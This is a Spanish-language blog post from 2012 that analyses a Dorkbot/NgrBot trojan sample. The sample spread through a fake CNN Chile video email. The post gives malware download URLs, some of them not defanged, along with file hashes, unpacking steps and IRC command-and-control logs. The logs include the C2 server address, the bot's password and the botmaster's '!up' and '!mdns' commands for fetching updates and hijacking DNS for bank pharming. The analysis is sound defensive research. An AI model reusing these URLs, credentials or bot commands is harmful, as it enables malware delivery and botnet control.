Dorkbot / NgrBot (Parte II)
En el día de ayer me reenviaron un mail de un supuesto video de la CNN Chile
con subject: "Sexo masivo en playa nudista" el cual tiene un link a un ejecutable.
Link:
hxxp//www.sistemadegestion.cl/cnnchileactualidad.php
Descarga del troyano.
hxxp://www.cravattificioitaliano.it/includes/languages/cnnchile.exe
(actualizado hxxp://megamovimientos.com/web/cnnchileactualidad.exe)
(actualizado hxxp://megamovimientos.com/web/cnnchileactualidad.exe)
Imagen hot...
hxxp://kodra-tron.hr/images/video.jpg
Enviando la muestra a Virus Total me entrega lo siguiente:
SHA256: aa995b1472ad73b781c40b9c6c4ab83d3bdd781b07256345d77b9e24b2812eee
Nombre: cnnchile.exe
Detecciones: 9 / 42
Fecha de análisis: 2012-02-06 03:08:25 UTC ( hace 0 minutos )
Un pequeño vistazo con un editor Hexadecimal me muestra que esta compactado con UPX .
Lo desempacamos con UPX.
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2011
UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011
File size Ratio Format Name
-------------------- ------ ----------- -----------
204800 <- 157696 77.00% win32/pe cnnchile.exe
Unpacked 1 file.
Lo cargo en el Ollydbg y veo que tiene una capa de encripcion realizada con un Crypter en C++
Lo desencripto obteniendo el fichero original.
000586C8 | 61 69 6E 20 72 65 61 73 | ain reas |
000586D0 | 6F 6E 73 3A 0D 0A 2D 20 | ons:..- |
000586D8 | 79 6F 75 20 73 74 75 70 | you stup |
000586E0 | 69 64 20 63 72 61 63 6B | id crack |
000586E8 | 65 72 0D 0A 2D 20 79 6F | er..- yo |
000586F0 | 75 20 73 74 75 70 69 64 | u stupid |
000586F8 | 20 63 72 61 63 6B 65 72 | cracker |
00058700 | 2E 2E 2E 0D 0A 2D 20 79 | .....- y |
00058708 | 6F 75 20 73 74 75 70 69 | ou stupi |
00058710 | 64 20 63 72 61 63 6B 65 | d cracke |
00058718 | 72 3F 21 0D 0A 00 00 00 | r?!..... |
00058720 | 6E 67 72 42 6F 74 20 45 | ngrBot E |
00058728 | 72 72 6F 72 00 00 00 00 | rror.... |
00058730 | 73 68 65 6C 6C 33 32 2E | shell32. |
00058738 | 64 6C 6C 00 22 00 25 00 | dll.".%. |
00058740 | 73 00 22 00 20 00 25 00 | s.". .%. |
00058748 | 53 00 00 00 6D 73 67 00 | S...msg. |
Analizando el Trafico de red del bot, el mismo se
conecta al servidor de IRC 173.224.220.218:1863 con
usuario = hzbcoct
password = secret
luego hace un join a los canales #bots y #ar a la espera de comandos.
Log..........................................................
[06/02/2012 1:05:01:680]
PASS secret
NICK n{AR|XPa}hzbcoct
USER hzbcoct 0 0 :hzbcoct
[06/02/2012 1:05:02:181]
:001 get.lost
002 002 002
003 003 003
004 004 004
005 005 005
005 005 005
005 005 005
PING 422 MOTD
[06/02/2012 1:05:02:181]
JOIN #bots priv8s
[06/02/2012 1:05:02:422]
:n{AR|XPa}hzbcoct!hzbcoct@190.172.106.28 JOIN :#bots
:get.lost 332 n{AR|XPa}hzbcoct #bots :!s
:get.lost 333 n{AR|XPa}hzbcoct #bots xarnas 1328495090
[06/02/2012 1:05:02:422]
JOIN #AR
[06/02/2012 1:05:02:662]
:n{AR|XPa}hzbcoct!hzbcoct@190.172.106.28 JOIN :#AR
Log.......................................................
Quedo a la espera de comandos pero nada... se ve que el botmaster es medio vago.
Al otro día me conecto con un cliente IRC y se pueden ver dos comandos, uno para descargar un ejecutable (update bot) y otro para realizar pharming al Banco davivienda.com
Nuevo ejecutable en http://jjij.in/nr.exe
Lo bajo y analizo en VT
SHA256: 1ecf4c538676040b7b704f2f13484ffbe6b65d860c46f0f7096679215e6beeef
Nombre: nr.exe
Detecciones: 2 / 43
Fecha de análisis: 2012-02-06 22:37:42 UTC ( hace 1 hora, 38 minutos )
Paso a tener menos detecciones que el anterior.
Analizamos....Idem anterior UPX + Crypter..
Desencriptamos con Ollydbg.... y.... es otro Dorkbot...
Actualización 10/02/2012!!! --------------------------
Nuevo binario.
http://jjij.in/nr.exe
SHA256: | 5b2f9ddca23818ce79113d1bab8f8ccd4a1cafbd5d7710b01ed7133cbe97fe75 |
File name: | nr.exe |
Detection ratio: | 1 / 43 |
Analysis date: | 2012-02-10 23:00:29 UTC ( 19 minutes ago ) |
Si!!! Otro DorkBot pero con otro tipo de ofuscación, ya no tiene le clásico UPX (este resulto mas fácil destriparlo...jaja)
Nuevo pharming
Comunicación de los Bots con el IRC
PASS secret
NICK n{AR|XPa}cnrsibx
USER cnrsibx 0 0 :cnrsibx
[10/02/2012 20:54:11:472]
:001 get.lost
002 002 002
003 003 003
004 004 004
005 005 005
005 005 005
005 005 005
PING 422 MOTD
[10/02/2012 20:54:11:472]
JOIN #bots priv8s
[10/02/2012 20:54:11:683]
:n{AR|XPa}cnrsibx!cnrsibx@190.172.96.15 JOIN :#bots
:get.lost 332 n{AR|XPa}cnrsibx #bots :!s
:get.lost 333 n{AR|XPa}cnrsibx #bots alive 1328908290
[10/02/2012 20:54:11:683]
JOIN #AR
[10/02/2012 20:54:11:893]
:n{AR|XPa}cnrsibx!cnrsibx@xxx.xxx.xxx.xxxJOIN :#AR
El topic para #bots es !s !up http://jjij.in/nr.exe 84280c20f5e9b2dad083e42b0a0a3b11 !mdns http://jjij.in/DNS.txt
De lo que se observa:
el comando !up para updatear el ejecutable
el comando !mdns modificar dns, cargando los sitios de phishing al archivo .host
Eso es todo por hoy.... Saludos!
@Dkavalanche 2012
No hay comentarios:
Publicar un comentario